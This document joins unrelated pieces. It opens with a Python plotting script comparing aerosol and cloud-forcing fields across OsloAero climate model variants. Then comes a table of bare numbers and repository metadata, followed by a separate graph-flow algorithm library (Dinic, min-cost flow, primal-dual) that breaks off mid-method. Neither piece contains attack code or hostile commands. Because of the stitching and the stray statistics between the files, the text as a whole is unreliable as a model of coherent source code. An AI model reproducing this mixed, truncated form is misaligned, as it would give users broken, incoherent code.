# orders of magnitude, linear for the forcing diagnostics.
norm_dic = dict(
    SOA_LV=colors.SymLogNorm(vmin=-5e-1, vmax=5e-1, linthresh=.01, base=10, linscale=.4),
    H2SO4=colors.SymLogNorm(vmin=-5e-1, vmax=5e-1, linthresh=.01, base=10, linscale=.4),
    NCONC01=colors.SymLogNorm(vmin=-1e3, vmax=1e3, linthresh=10, base=10, linscale=.4),
    NMR01=colors.SymLogNorm(vmin=-10, vmax=10, linthresh=1, base=10),  # linscale=.5),
    AWNC_incld=colors.SymLogNorm(vmin=-50, vmax=50, linthresh=1, base=10),
    ACTNL_incld=colors.SymLogNorm(vmin=-40, vmax=40, linthresh=1, linscale=0.4, base=10),
    AREL_incld=colors.SymLogNorm(vmin=-5, vmax=5, linthresh=.1, base=10),
    ACTREL_incld=colors.SymLogNorm(vmin=-7, vmax=7, linthresh=.1, base=10, linscale=0.5),
    CDNUMC=None,
    SWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
    LWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
    NCFT_Ghan=colors.Normalize(vmin=-2, vmax=2),
)
# Norms for relative (%) difference panels:
norm_dic_rel = dict(
    SOA_LV=colors.Normalize(vmin=-50, vmax=50),
    H2SO4=colors.Normalize(vmin=-50, vmax=50),
    NCONC01=colors.Normalize(vmin=-250, vmax=250),
    NMR01=colors.Normalize(vmin=-50, vmax=50),
    AWNC_incld=colors.Normalize(vmin=-50, vmax=50),
    ACTNL_incld=colors.Normalize(vmin=-13, vmax=13),
    AREL_incld=colors.Normalize(vmin=-10, vmax=10),
    ACTREL_incld=colors.Normalize(vmin=-7, vmax=7),
    CDNUMC=colors.Normalize(vmin=-12, vmax=12),
    SWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
    LWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
    NCFT_Ghan=colors.Normalize(vmin=-2, vmax=2),
)
# Absolute-field norms: like norm_dic but wider limits for the forcings.
norm_abs = norm_dic.copy()
norm_abs['SWCF_Ghan'] = colors.Normalize(vmin=-5, vmax=5)
norm_abs['LWCF_Ghan'] = colors.Normalize(vmin=-3, vmax=3)
norm_abs['NCFT_Ghan'] = colors.Normalize(vmin=-5, vmax=5)
# Norms for the difference-of-differences panels.
# Fix: the original defined norm_diff_dic twice back to back; only the
# second assignment ever took effect, so the dead first dict is removed.
norm_diff_dic = dict(
    ACTNL_incld=colors.Normalize(vmin=-12, vmax=12),
    N50=colors.Normalize(vmin=-45, vmax=45),
    N100=colors.Normalize(vmin=-10, vmax=10),
    N150=colors.Normalize(vmin=-4, vmax=4),  # colors.Normalize(vmin=-5, vmax=5),
    N200=colors.Normalize(vmin=-5, vmax=5),  # colors.Normalize(vmin=-5, vmax=5),
)
norm_dic['NCFT_Ghan'] = colors.Normalize(vmin=-1.8, vmax=1.8)
# Fix: key was misspelled 'ACNTL_incld' in the original, so this override
# landed on a stray key instead of 'ACTNL_incld' (the value matches the
# dict's original entry, so plot output is unchanged).
norm_dic['ACTNL_incld'] = colors.SymLogNorm(vmin=-40, vmax=40, linthresh=1, linscale=0.4, base=10)
# %% [markdown]
# ## define cases to be ctrl or other:
# %%
# Display names: the two non-sectional model variants; ctrl is the sectional run.
cases_oth = ['OsloAero$_{imp}$', 'OsloAero$_{def}$']
ctrl = 'OsloAeroSec'
# %%
# Direct forcing: absolute maps + model differences, with significance
# overlay (95% CI) of ctrl vs each other model; no hatching here.
var = 'DIR_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                   var,
                                   relative=relative,
                                   type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                   switch_diff=True,
                                   # norm_diff = norm_dic['NCFT_Ghan'],
                                   norm_diff=colors.Normalize(vmin=-.12, vmax=.12)
                                   )
for ct in ['PI', 'PIaerPD']:
    ax_di = axs_dic[ct]
    for case_oth in cases_oth:
        ax = ax_di[case_oth]
        cs_to = get_casen_by_type_mod(ct, ctrl)
        cs_from = get_casen_by_type_mod(ct, case_oth)
        load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
                           avg_over_lev=avg_over_lev,
                           ci=.95,
                           groupby=None,
                           dims=('lev',),
                           area='Global',
                           avg_dim='time',
                           hatches=None, hatch_lw=1, transform=ccrs.PlateCarree(),
                           reverse=False)
clear_output()
axs = [axs_dic['PI'][c] for c in ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']]  # [cases_oth]
# subp_insert_abc(np.array(axs), pos_x=0.01,pos_y=1.0)
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
# NCONC01 relative differences with stippled significance hatching.
var = 'NCONC01'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                   var,
                                   relative=relative,
                                   type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                   switch_diff=True,
                                   norm_diff=colors.Normalize(vmin=-100, vmax=100)
                                   )
for ct in ['PI', 'PIaerPD']:
    ax_di = axs_dic[ct]
    for case_oth in cases_oth:
        ax = ax_di[case_oth]
        cs_to = get_casen_by_type_mod(ct, ctrl)
        cs_from = get_casen_by_type_mod(ct, case_oth)
        load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
                           avg_over_lev=avg_over_lev,
                           ci=.95,
                           groupby=None,
                           dims=('lev',),
                           area='Global',
                           avg_dim='time',
                           hatches=['...', ''],
                           hatch_lw=.6,
                           transform=ccrs.PlateCarree(),
                           reverse=False
                           )
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
# Net cloud forcing ('NCFT_Ghan'): diverging RdBu colormap for the
# absolute panels, significance stippling on the difference panels.
var = 'NCFT_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                   var,
                                   relative=relative,
                                   type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                   switch_diff=True,
                                   norm_diff=norm_dic['NCFT_Ghan'],
                                   cmap_abs='RdBu_r'
                                   # norm_diff=colors.Normalize(vmin=-100, vmax=100)
                                   )
for ct in ['PI', 'PIaerPD']:
    ax_di = axs_dic[ct]
    for case_oth in cases_oth:
        ax = ax_di[case_oth]
        cs_to = get_casen_by_type_mod(ct, ctrl)
        cs_from = get_casen_by_type_mod(ct, case_oth)
        load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
                           avg_over_lev=avg_over_lev,
                           ci=.95,
                           groupby=None,
                           dims=('lev',),
                           area='Global',
                           avg_dim='time',
                           hatches=['...', ''],
                           hatch_lw=.6,
                           transform=ccrs.PlateCarree(),
                           reverse=False)
clear_output()
axs = [axs_dic['PI'][c] for c in ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']]  # [cases_oth]
# subp_insert_abc(np.array(axs), pos_x=0.01,pos_y=1.0)
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
# Shortwave cloud forcing: same layout, sequential Blues colormap for the
# absolute panels.
var = 'SWCF_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                   var,
                                   relative=relative,
                                   type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                   switch_diff=True,
                                   norm_diff=norm_dic['NCFT_Ghan'],
                                   cmap_abs='Blues_r'
                                   # norm_diff=colors.Normalize(vmin=-100, vmax=100)
                                   )
for ct in ['PI', 'PIaerPD']:
    ax_di = axs_dic[ct]
    for case_oth in cases_oth:
        ax = ax_di[case_oth]
        cs_to = get_casen_by_type_mod(ct, ctrl)
        cs_from = get_casen_by_type_mod(ct, case_oth)
        load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
                           avg_over_lev=avg_over_lev,
                           ci=.95,
                           groupby=None,
                           dims=('lev',),
                           area='Global',
                           avg_dim='time',
                           hatches=['...', ''],
                           hatch_lw=.6,
                           transform=ccrs.PlateCarree(),
                           reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
# Longwave cloud forcing: same layout, default colormap.
var = 'LWCF_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                   var,
                                   relative=relative,
                                   type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                   switch_diff=True,
                                   norm_diff=norm_dic['NCFT_Ghan'],
                                   # norm_diff=colors.Normalize(vmin=-100, vmax=100)
                                   )
for ct in ['PI', 'PIaerPD']:
    ax_di = axs_dic[ct]
    for case_oth in cases_oth:
        ax = ax_di[case_oth]
        cs_to = get_casen_by_type_mod(ct, ctrl)
        cs_from = get_casen_by_type_mod(ct, case_oth)
        load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
                           avg_over_lev=avg_over_lev,
                           ci=.95,
                           groupby=None,
                           dims=('lev',),
                           area='Global',
                           avg_dim='time',
                           hatches=['...', ''],
                           hatch_lw=.6,
                           transform=ccrs.PlateCarree(),
                           reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
print(fn)
# %%
# CDNUMC and TGCLDLWP relative-difference maps used two byte-identical
# cells differing only in the variable and the symmetric diff-norm limit;
# loop over (var, limit) pairs instead of repeating the code.
relative = True
for var, _lim in [('CDNUMC', 12), ('TGCLDLWP', 5)]:
    fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                       var,
                                       relative=relative,
                                       type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                       switch_diff=True,
                                       norm_diff=colors.Normalize(vmin=-_lim, vmax=_lim)
                                       )
    # Overlay significance stippling (95% CI) for ctrl vs each other model.
    for ct in ['PI', 'PIaerPD']:
        ax_di = axs_dic[ct]
        for case_oth in cases_oth:
            ax = ax_di[case_oth]
            cs_to = get_casen_by_type_mod(ct, ctrl)
            cs_from = get_casen_by_type_mod(ct, case_oth)
            load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear,
                               pressure_adjust=pressure_adjust,
                               avg_over_lev=avg_over_lev,
                               ci=.95,
                               groupby=None,
                               dims=('lev',),
                               area='Global',
                               avg_dim='time',
                               hatches=['...', ''],
                               hatch_lw=.6,
                               transform=ccrs.PlateCarree(),
                               reverse=False)
    clear_output()
    fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
    fig.savefig(fn, dpi=300)
    plt.show()
    print(fn)
# %%
# N50, N100 and N150 relative-difference maps used three near-identical
# cells; loop over the variables and supply a fixed diff-norm only where
# the original did (N100), otherwise let the plot routine pick its default.
relative = True
_norm_diffs = {
    'N100': colors.Normalize(vmin=-50, vmax=50),
}
for var in ['N50', 'N100', 'N150']:
    _kwargs = {}
    if var in _norm_diffs:
        _kwargs['norm_diff'] = _norm_diffs[var]
    fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                       var,
                                       relative=relative,
                                       type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                       switch_diff=True,
                                       **_kwargs
                                       )
    # Overlay significance stippling (95% CI) for ctrl vs each other model.
    for ct in ['PI', 'PIaerPD']:
        ax_di = axs_dic[ct]
        for case_oth in cases_oth:
            ax = ax_di[case_oth]
            cs_to = get_casen_by_type_mod(ct, ctrl)
            cs_from = get_casen_by_type_mod(ct, case_oth)
            load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear,
                               pressure_adjust=pressure_adjust,
                               avg_over_lev=avg_over_lev,
                               ci=.95,
                               groupby=None,
                               dims=('lev',),
                               area='Global',
                               avg_dim='time',
                               hatches=['...', ''],
                               hatch_lw=.6,
                               transform=ccrs.PlateCarree(),
                               reverse=False)
    clear_output()
    fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
    plt.show()
# %%
# N200 and N250 relative-difference maps used two identical cells with the
# same diff-norm; loop over the two variables instead.
relative = True
for var in ['N200', 'N250']:
    fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                       var,
                                       relative=relative,
                                       type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                       switch_diff=True,
                                       norm_diff=colors.Normalize(vmin=-13, vmax=+13)
                                       )
    # Overlay significance stippling (95% CI) for ctrl vs each other model.
    for ct in ['PI', 'PIaerPD']:
        ax_di = axs_dic[ct]
        for case_oth in cases_oth:
            ax = ax_di[case_oth]
            cs_to = get_casen_by_type_mod(ct, ctrl)
            cs_from = get_casen_by_type_mod(ct, case_oth)
            load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear,
                               pressure_adjust=pressure_adjust,
                               avg_over_lev=avg_over_lev,
                               ci=.95,
                               groupby=None,
                               dims=('lev',),
                               area='Global',
                               avg_dim='time',
                               hatches=['...', ''],
                               hatch_lw=.6,
                               transform=ccrs.PlateCarree(),
                               reverse=False)
    clear_output()
    fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
    plt.show()
# %%
# AWNC_incld and ACTNL_incld relative-difference maps used two identical
# cells (default diff-norm); loop over the two variables. The saved
# filename is printed for both (the original printed it only for AWNC).
relative = True
for var in ['AWNC_incld', 'ACTNL_incld']:
    fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                       var,
                                       relative=relative,
                                       type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                       switch_diff=True,
                                       )
    # Overlay significance stippling (95% CI) for ctrl vs each other model.
    for ct in ['PI', 'PIaerPD']:
        ax_di = axs_dic[ct]
        for case_oth in cases_oth:
            ax = ax_di[case_oth]
            cs_to = get_casen_by_type_mod(ct, ctrl)
            cs_from = get_casen_by_type_mod(ct, case_oth)
            load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear,
                               pressure_adjust=pressure_adjust,
                               avg_over_lev=avg_over_lev,
                               ci=.95,
                               groupby=None,
                               dims=('lev',),
                               area='Global',
                               avg_dim='time',
                               hatches=['...', ''],
                               hatch_lw=.6,
                               transform=ccrs.PlateCarree(),
                               reverse=False)
    clear_output()
    fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
    fig.savefig(fn, dpi=300)
    print(fn)
    plt.show()
# %%
print(fn)
# %%
# SIGMA01 and NMR01 relative-difference maps used two identical cells
# (no switch_diff here); loop over the two variables instead.
relative = True
for var in ['SIGMA01', 'NMR01']:
    fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                       var,
                                       relative=relative,
                                       type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'}
                                       )
    # Overlay significance stippling (95% CI) for ctrl vs each other model.
    for ct in ['PI', 'PIaerPD']:
        ax_di = axs_dic[ct]
        for case_oth in cases_oth:
            ax = ax_di[case_oth]
            cs_to = get_casen_by_type_mod(ct, ctrl)
            cs_from = get_casen_by_type_mod(ct, case_oth)
            load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear,
                               pressure_adjust=pressure_adjust,
                               avg_over_lev=avg_over_lev,
                               ci=.95,
                               groupby=None,
                               dims=('lev',),
                               area='Global',
                               avg_dim='time',
                               hatches=['...', ''],
                               hatch_lw=.6,
                               transform=ccrs.PlateCarree(),
                               reverse=False)
    clear_output()
    fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
    plt.show()
# %%
# NCONC08, NMR08, NMR09, NCONC09 and N_AER relative-difference maps used
# five byte-identical cells differing only in the variable name; loop over
# the variables instead of repeating the cell five times.
relative = True
for var in ['NCONC08', 'NMR08', 'NMR09', 'NCONC09', 'N_AER']:
    fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                       var,
                                       relative=relative,
                                       type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
                                       switch_diff=True
                                       )
    # Overlay significance stippling (95% CI) for ctrl vs each other model.
    for ct in ['PI', 'PIaerPD']:
        ax_di = axs_dic[ct]
        for case_oth in cases_oth:
            ax = ax_di[case_oth]
            cs_to = get_casen_by_type_mod(ct, ctrl)
            cs_from = get_casen_by_type_mod(ct, case_oth)
            load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear,
                               pressure_adjust=pressure_adjust,
                               avg_over_lev=avg_over_lev,
                               ci=.95,
                               groupby=None,
                               dims=('lev',),
                               area='Global',
                               avg_dim='time',
                               hatches=['...', ''],
                               hatch_lw=.6,
                               transform=ccrs.PlateCarree(),
                               reverse=False)
    clear_output()
    fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
    plt.show()
# %%
| 37.416043
| 108
| 0.47759
| 3,840
| 34,984
| 4.049479
| 0.071875
| 0.02836
| 0.059871
| 0.038714
| 0.836141
| 0.82283
| 0.804309
| 0.802444
| 0.797299
| 0.791897
| 0
| 0.0277
| 0.406643
| 34,984
| 934
| 109
| 37.456103
| 0.721409
| 0.053367
| 0
| 0.783019
| 0
| 0
| 0.085008
| 0.024708
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001348
| 0.01752
| 0
| 0.01752
| 0.013477
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70f7c69c928952fcc252d0b5958c8ab7d8a3fdf7
| 13,593
|
py
|
Python
|
flow.py
|
nohtaray/competitive-programming
|
ac5002fedbb6f27b515a10898936f52180715269
|
[
"CC0-1.0"
] | 1
|
2021-02-08T07:15:17.000Z
|
2021-02-08T07:15:17.000Z
|
flow.py
|
nohtaray/competitive-programming.py
|
ac5002fedbb6f27b515a10898936f52180715269
|
[
"CC0-1.0"
] | null | null | null |
flow.py
|
nohtaray/competitive-programming.py
|
ac5002fedbb6f27b515a10898936f52180715269
|
[
"CC0-1.0"
] | null | null | null |
import heapq
from collections import defaultdict, deque
class Dinic:
    """Maximum flow on integer-indexed vertices via Dinic's algorithm.

    Edges are stored as mutable lists ``[to, cap, rev]`` where ``rev`` is
    the paired reverse edge; pushing flow mutates both directions in place.
    The internal parameter previously named ``iter`` (shadowing the
    builtin) is renamed ``edge_iter``.
    """

    def __init__(self, graph=None, residual=None):
        """
        :param list of (list of (int, int)) graph: adjacency list of (to, cap)
        :param list of (list of (list of (int|list))) residual: residual graph of (to, cap, rev)
        """
        # Exactly one of graph/residual must be supplied.
        assert (graph and not residual) or (not graph and residual)
        if graph:
            self.graph = self.residual_graph(graph)
        else:
            self.graph = residual

    @staticmethod
    def residual_graph(graph):
        """Build the residual graph.

        :param list of (list of (int, int)) graph: adjacency list of (to, cap)
        :rtype: list of (list of (list of (int|list)))
        :return: residual graph of (to, cap, rev)
        """
        ret = [[] for _ in range(len(graph))]
        for v in range(len(graph)):
            for u, cap in graph[v]:
                # Forward/reverse edges reference each other so capacity
                # updates stay consistent; reverse edges start at cap 0.
                rev = [v, 0]
                edge = [u, cap, rev]
                rev.append(edge)
                ret[v].append(edge)
                ret[u].append(rev)
        return ret

    def _dist(self, s):
        """BFS level graph.

        :param int s:
        :rtype: list of int
        :return: distance from s; -1 where unreachable in the residual graph
        """
        ret = [-1] * len(self.graph)
        ret[s] = 0
        que = deque([(s, 0)])
        while que:
            v, d = que.popleft()
            for u, cap, _ in self.graph[v]:
                if ret[u] < 0 < cap:
                    ret[u] = d + 1
                    que.append((u, d + 1))
        return ret

    def _dfs(self, s, t, dist, edge_iter, flow=float('inf')):
        """Find one augmenting path along strictly increasing BFS levels.

        :param int s:
        :param int t:
        :param list of int dist: BFS levels from the source
        :param list of int edge_iter: per-vertex index of the next edge to try
        :param int flow: bottleneck capacity so far
        """
        if s == t:
            return flow
        while edge_iter[s] < len(self.graph[s]):
            edge = self.graph[s][edge_iter[s]]
            to, cap, rev = edge
            if dist[s] < dist[to] and cap > 0:
                f = self._dfs(to, t, dist, edge_iter, min(flow, cap))
                if f > 0:
                    # Push f along this edge; the reverse edge gains capacity.
                    edge[1] -= f
                    rev[1] += f
                    return f
            edge_iter[s] += 1
        return 0

    def maximum_flow(self, from_v, to_v):
        """
        :param int from_v:
        :param int to_v:
        :return: maximum flow from from_v to to_v
        """
        ret = 0
        while True:
            dist = self._dist(from_v)
            if dist[to_v] < 0:
                # Sink unreachable in the residual graph: done.
                break
            edge_iter = [0] * len(self.graph)
            while True:
                flow = self._dfs(from_v, to_v, dist, edge_iter)
                if flow == 0:
                    break
                ret += flow
        return ret
class DictDinic:
    """Dinic's maximum flow with arbitrary hashable vertex labels.

    Variant of ``Dinic`` whose vertices may be any hashable value, not just
    ints; adjacency and distances are kept in defaultdicts. The internal
    parameter previously named ``iter`` (shadowing the builtin) is renamed
    ``edge_iter``.
    """

    def __init__(self, graph=None, residual=None):
        """
        :param dict[Any, (list of (Any, int))] graph: adjacency list of (to, cap)
        :param dict[Any, (list of list)] residual: residual graph of (to, cap, rev)
        """
        # Exactly one of graph/residual must be supplied.
        assert (graph and not residual) or (not graph and residual)
        if graph:
            self.graph = self.residual_graph(graph)
        else:
            self.graph = residual

    @staticmethod
    def residual_graph(graph):
        """Build the residual graph.

        :param dict[Any, (list of (Any, int))] graph: adjacency list of (to, cap)
        :rtype: dict[Any, (list of list)]
        :return: residual graph of (to, cap, rev)
        """
        ret = defaultdict(list)
        for v in graph.keys():
            for u, cap in graph[v]:
                # Paired forward/reverse edges referencing each other so
                # capacity updates stay consistent; reverse edges start at 0.
                rev = [v, 0]
                edge = [u, cap, rev]
                rev.append(edge)
                ret[v].append(edge)
                ret[u].append(rev)
        return ret

    def _dist(self, s):
        """BFS distances from ``s`` in the residual graph.

        :param s: source vertex
        :rtype: dict[Any, int]
        :return: distance from s; -1 (the defaultdict default) where unreachable
        """
        ret = defaultdict(lambda: -1)
        ret[s] = 0
        que = deque([(s, 0)])
        while que:
            v, d = que.popleft()
            for u, cap, _ in self.graph[v]:
                if ret[u] < 0 < cap:
                    ret[u] = d + 1
                    que.append((u, d + 1))
        return ret

    def _dfs(self, s, t, dist, edge_iter, flow=float('inf')):
        """Find one augmenting path along strictly increasing BFS levels.

        :param s: current vertex
        :param t: sink vertex
        :param dict[Any, int] dist: BFS levels from the source
        :param dict[Any, int] edge_iter: per-vertex index of the next edge to try
        :param int flow: bottleneck capacity so far
        """
        if s == t:
            return flow
        while edge_iter[s] < len(self.graph[s]):
            edge = self.graph[s][edge_iter[s]]
            to, cap, rev = edge
            if dist[s] < dist[to] and cap > 0:
                f = self._dfs(to, t, dist, edge_iter, min(flow, cap))
                if f > 0:
                    # Push f along this edge; the reverse edge gains capacity.
                    edge[1] -= f
                    rev[1] += f
                    return f
            edge_iter[s] += 1
        return 0

    def maximum_flow(self, from_v, to_v):
        """
        :param from_v: source vertex
        :param to_v: sink vertex
        :return: maximum flow from from_v to to_v
        """
        ret = 0
        while True:
            dist = self._dist(from_v)
            if dist[to_v] < 0:
                # Sink unreachable in the residual graph: done.
                break
            edge_iter = defaultdict(int)
            while True:
                flow = self._dfs(from_v, to_v, dist, edge_iter)
                if flow == 0:
                    break
                ret += flow
        return ret
class MinCostFlow:
    """
    Minimum cost flow, Bellman-Ford (successive shortest paths) variant.
    Edges are mutable lists [to, cap, cost, rev]; rev is the paired
    reverse edge, so pushing flow updates both directions in place.
    """
    def __init__(self, graph=None, residual=None):
        """
        :param list of (list of (int, int, int)) graph: adjacency list of (to, cap, cost)
        :param list of (list of (list of (int|list))) residual: residual graph of (to, cap, cost, rev)
        """
        # Exactly one of graph/residual must be supplied.
        assert (graph and not residual) or (not graph and residual)
        if graph:
            self.graph = self.residual_graph(graph)
        else:
            self.graph = residual
    @staticmethod
    def residual_graph(graph):
        """
        Build the residual graph.
        :param list of (list of (int, int, int)) graph: adjacency list of (to, cap, cost)
        :rtype: list of (list of (list of (int|list)))
        :return: residual graph of (to, cap, cost, rev)
        """
        ret = [[] for _ in range(len(graph))]
        for v in range(len(graph)):
            for u, cap, cost in graph[v]:
                # Reverse edge: zero capacity, negated cost; edge and rev
                # reference each other so flow updates stay consistent.
                rev = [v, 0, -cost]
                edge = [u, cap, cost, rev]
                rev.append(edge)
                ret[v].append(edge)
                ret[u].append(rev)
        return ret
    def solve(self, from_v, to_v, flow):
        """
        Route `flow` units from from_v to to_v at minimum total cost.
        :param int from_v:
        :param int to_v:
        :param int flow:
        :rtype: int
        :return: total cost, or -1 if the full `flow` cannot be routed
        """
        remains = flow
        total_cost = 0
        while remains > 0:
            # Shortest path by Bellman-Ford (residual costs may be negative).
            dist = [float('inf')] * len(self.graph)
            preve = [None] * len(self.graph)  # edge used to reach each vertex
            prevv = [None] * len(self.graph)  # predecessor vertex
            dist[from_v] = 0
            stop = False
            while not stop:
                stop = True
                for v, edges in enumerate(self.graph):
                    for edge in edges:
                        u, cap, cost, rev = edge
                        if cap > 0 and dist[v] + cost < dist[u]:
                            dist[u] = dist[v] + cost
                            prevv[u] = v
                            preve[u] = edge
                            stop = False
            flow = remains
            if dist[to_v] == float('inf'):
                # Sink unreachable: remaining flow cannot be routed.
                total_cost = -1
                break
            # Bottleneck capacity along the shortest path.
            v = to_v
            while v != from_v:
                cap = preve[v][1]
                v = prevv[v]
                flow = min(cap, flow)
            # Push `flow` along the path, accumulating its cost.
            cost = 0
            v = to_v
            while v != from_v:
                cost += preve[v][2] * flow
                preve[v][1] -= flow
                preve[v][3][1] += flow
                v = prevv[v]
            remains -= flow
            total_cost += cost
        return total_cost
class DictMinCostFlow:
    """
    Minimum cost flow, Bellman-Ford variant.
    Variant of MinCostFlow whose vertices may be any hashable value, not
    just ints; all per-vertex state is kept in defaultdicts.
    """
    def __init__(self, graph=None, residual=None):
        """
        :param dict[Any, (list of (Any, int, int))] graph: adjacency list of (to, cap, cost)
        :param dict[Any, (list of list)] residual: residual graph of (to, cap, cost, rev)
        """
        # Exactly one of graph/residual must be supplied.
        assert (graph and not residual) or (not graph and residual)
        if graph:
            self.graph = self.residual_graph(graph)
        else:
            self.graph = residual
    @staticmethod
    def residual_graph(graph):
        """
        Build the residual graph.
        :param dict[Any, (list of (Any, int, int))] graph: adjacency list of (to, cap, cost)
        :rtype: dict[Any, (list of list)]
        :return: residual graph of (to, cap, cost, rev)
        """
        ret = defaultdict(list)
        for v in graph.keys():
            for u, cap, cost in graph[v]:
                # Reverse edge: zero capacity, negated cost; edge and rev
                # reference each other so flow updates stay consistent.
                rev = [v, 0, -cost]
                edge = [u, cap, cost, rev]
                rev.append(edge)
                ret[v].append(edge)
                ret[u].append(rev)
        return ret
    def solve(self, from_v, to_v, flow):
        """
        Route `flow` units from from_v to to_v at minimum total cost.
        :param from_v:
        :param to_v:
        :param int flow:
        :return: total cost, or -1 if the full `flow` cannot be routed
        """
        remains = flow
        total_cost = 0
        while remains > 0:
            # Shortest path by Bellman-Ford (residual costs may be negative).
            dist = defaultdict(lambda: float('inf'))
            preve = defaultdict(lambda: None)  # edge used to reach each vertex
            prevv = defaultdict(lambda: None)  # predecessor vertex
            dist[from_v] = 0
            stop = False
            while not stop:
                stop = True
                for v, edges in self.graph.items():
                    for edge in edges:
                        u, cap, cost, rev = edge
                        if cap > 0 and dist[v] + cost < dist[u]:
                            dist[u] = dist[v] + cost
                            prevv[u] = v
                            preve[u] = edge
                            stop = False
            flow = remains
            if dist[to_v] == float('inf'):
                # Sink unreachable: remaining flow cannot be routed.
                total_cost = -1
                break
            # Bottleneck capacity along the shortest path.
            v = to_v
            while v != from_v:
                cap = preve[v][1]
                v = prevv[v]
                flow = min(cap, flow)
            # Push `flow` along the path, accumulating its cost.
            cost = 0
            v = to_v
            while v != from_v:
                cost += preve[v][2] * flow
                preve[v][1] -= flow
                preve[v][3][1] += flow
                v = prevv[v]
            remains -= flow
            total_cost += cost
        return total_cost
class PrimalDual:
    """
    Minimum cost flow, Dijkstra (primal-dual) variant.
    Uses vertex potentials `h` to keep reduced edge costs non-negative so
    Dijkstra can be used for each augmentation; initial edge costs are
    therefore expected to be non-negative.
    """
    def __init__(self, graph=None, residual=None):
        """
        :param list of (list of (int, int, int)) graph: adjacency list of (to, cap, cost)
        :param list of (list of (list of (int|list))) residual: residual graph of (to, cap, cost, rev)
        """
        # Exactly one of graph/residual must be supplied.
        assert (graph and not residual) or (not graph and residual)
        if graph:
            self.graph = self.residual_graph(graph)
        else:
            self.graph = residual
    @staticmethod
    def residual_graph(graph):
        """
        Build the residual graph.
        :param list of (list of (int, int, int)) graph: adjacency list of (to, cap, cost)
        :rtype: list of (list of (list of (int|list)))
        :return: residual graph of (to, cap, cost, rev)
        """
        ret = [[] for _ in range(len(graph))]
        for v in range(len(graph)):
            for u, cap, cost in graph[v]:
                # Reverse edge: zero capacity, negated cost; edge and rev
                # reference each other so flow updates stay consistent.
                rev = [v, 0, -cost]
                edge = [u, cap, cost, rev]
                rev.append(edge)
                ret[v].append(edge)
                ret[u].append(rev)
        return ret
    def solve(self, from_v, to_v, flow):
        """
        Route `flow` units from from_v to to_v at minimum total cost.
        :param int from_v:
        :param int to_v:
        :param int flow:
        :rtype: int
        :return: total cost, or -1 if the full `flow` cannot be routed
        """
        total_cost = 0
        prevv = [-1] * len(self.graph)  # predecessor vertex on shortest path
